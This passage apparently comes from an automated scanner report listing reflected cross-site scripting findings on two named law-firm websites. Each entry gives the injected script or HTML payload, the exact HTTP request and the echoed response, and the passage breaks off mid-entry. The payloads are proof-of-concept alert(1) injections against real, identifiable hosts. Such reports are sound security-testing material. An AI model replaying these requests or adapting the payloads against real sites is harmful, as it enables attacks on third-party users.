Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.5.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:28:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/news_events/indexc57c0"><script>alert(1)</script>082bddadd32-print">
...[SNIP]...

4.153. http://www.hbsr.com/news_events/index [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /news_events/index

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de00f"><script>alert(1)</script>81755691be4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news_events/index?de00f"><script>alert(1)</script>81755691be4=1 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/contact_us/index
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.5.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:27:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/news_events/index?de00f"><script>alert(1)</script>81755691be4=1&amp;printable=yes">
...[SNIP]...

4.154. http://www.hbsr.com/practices_technologies/biotechnology [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /practices_technologies/biotechnology

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bf7c"><script>alert(1)</script>b8520e48e4b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_technologies8bf7c"><script>alert(1)</script>b8520e48e4b/biotechnology HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/news_events/133-congratulations-finalists-invented-here-celebration-new-england
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.7.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:28:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8867

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/practices_technologies8bf7c"><script>alert(1)</script>b8520e48e4b/biotechnology-print">
...[SNIP]...

4.155. http://www.hbsr.com/practices_technologies/biotechnology [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /practices_technologies/biotechnology

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ae3f"><script>alert(1)</script>535c552892a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_technologies/biotechnology4ae3f"><script>alert(1)</script>535c552892a HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/news_events/133-congratulations-finalists-invented-here-celebration-new-england
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.7.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:28:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8867

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/practices_technologies/biotechnology4ae3f"><script>alert(1)</script>535c552892a-print">
...[SNIP]...

4.156. http://www.hbsr.com/practices_technologies/biotechnology [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /practices_technologies/biotechnology

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 406d7"><script>alert(1)</script>6b5c14438ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_technologies/biotechnology?406d7"><script>alert(1)</script>6b5c14438ca=1 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/news_events/133-congratulations-finalists-invented-here-celebration-new-england
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.7.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:28:11 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/practices_technologies/biotechnology?406d7"><script>alert(1)</script>6b5c14438ca=1&amp;printable=yes">
...[SNIP]...

4.157. http://www.hbsr.com/practices_technologies/index [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /practices_technologies/index

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e3ab"><script>alert(1)</script>633a1638eef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_technologies9e3ab"><script>alert(1)</script>633a1638eef/index HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.1.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:26:44 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8851

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/practices_technologies9e3ab"><script>alert(1)</script>633a1638eef/index-print">
...[SNIP]...

4.158. http://www.hbsr.com/practices_technologies/index [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /practices_technologies/index

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66193"><script>alert(1)</script>5ba64a12336 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_technologies/index66193"><script>alert(1)</script>5ba64a12336 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.1.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:26:44 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8851

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/practices_technologies/index66193"><script>alert(1)</script>5ba64a12336-print">
...[SNIP]...

4.159. http://www.hbsr.com/practices_technologies/index [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /practices_technologies/index

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23205"><script>alert(1)</script>ebacbb96fc1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_technologies/index?23205"><script>alert(1)</script>ebacbb96fc1=1 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.1.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:26:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9933

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/practices_technologies/index?23205"><script>alert(1)</script>ebacbb96fc1=1&amp;printable=yes">
...[SNIP]...

4.160. http://www.hbsr.com/practices_technologies/software [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /practices_technologies/software

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 940d0"><script>alert(1)</script>8c7d3e9285e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_technologies940d0"><script>alert(1)</script>8c7d3e9285e/software HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/practices_technologies/telecommunications
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.3.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:27:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/practices_technologies940d0"><script>alert(1)</script>8c7d3e9285e/software-print">
...[SNIP]...

4.161. http://www.hbsr.com/practices_technologies/software [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /practices_technologies/software

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 931a5"><script>alert(1)</script>bea7ff528b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_technologies/software931a5"><script>alert(1)</script>bea7ff528b1 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/practices_technologies/telecommunications
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.3.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:27:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/practices_technologies/software931a5"><script>alert(1)</script>bea7ff528b1-print">
...[SNIP]...

4.162. http://www.hbsr.com/practices_technologies/software [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /practices_technologies/software

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cf66"><script>alert(1)</script>9fc1b0ef96e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_technologies/software?6cf66"><script>alert(1)</script>9fc1b0ef96e=1 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/practices_technologies/telecommunications
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.3.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:27:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18763

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/practices_technologies/software?6cf66"><script>alert(1)</script>9fc1b0ef96e=1&amp;printable=yes">
...[SNIP]...

4.163. http://www.hbsr.com/practices_technologies/telecommunications [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /practices_technologies/telecommunications

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c3c6"><script>alert(1)</script>c469b26ecf4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_technologies7c3c6"><script>alert(1)</script>c469b26ecf4/telecommunications HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/practices_technologies/index
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.2.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:26:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8877

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/practices_technologies7c3c6"><script>alert(1)</script>c469b26ecf4/telecommunications-print">
...[SNIP]...

4.164. http://www.hbsr.com/practices_technologies/telecommunications [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /practices_technologies/telecommunications

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6292"><script>alert(1)</script>f9653883093 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_technologies/telecommunicationsd6292"><script>alert(1)</script>f9653883093 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/practices_technologies/index
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.2.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:26:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8877

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/practices_technologies/telecommunicationsd6292"><script>alert(1)</script>f9653883093-print">
...[SNIP]...

4.165. http://www.hbsr.com/practices_technologies/telecommunications [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /practices_technologies/telecommunications

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a22e"><script>alert(1)</script>2ad03aa0f89 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_technologies/telecommunications?4a22e"><script>alert(1)</script>2ad03aa0f89=1 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/practices_technologies/index
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.2.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:26:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17308

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/practices_technologies/telecommunications?4a22e"><script>alert(1)</script>2ad03aa0f89=1&amp;printable=yes">
...[SNIP]...

4.166. http://www.pillsburylaw.com/connect_forgotpassword.cfm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbbe9"><a>9ff6b508074 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /connect_forgotpassword.cfm?p=60&cbbe9"><a>9ff6b508074=1 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=60
Cookie: CFID=11812912; CFTOKEN=34459793; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmb=249287046.5.10.1305202905; __utmc=249287046; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11812912;path=/
Set-Cookie: CFTOKEN=34459793;path=/
Date: Thu, 12 May 2011 12:32:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javas
...[SNIP]...
<input type="hidden" class="formelement2" NAME="referringPage" VALUE="http://www.pillsburylaw.com/index.cfm?p=60&cbbe9"><a>9ff6b508074=1">
...[SNIP]...

4.167. http://www.pillsburylaw.com/connect_forgotpassword.cfm [p parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The value of the p request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24eb9"><img%20src%3da%20onerror%3dalert(1)>4643c09008e was submitted in the p parameter. This input was echoed as 24eb9"><img src=a onerror=alert(1)>4643c09008e in the application's response.

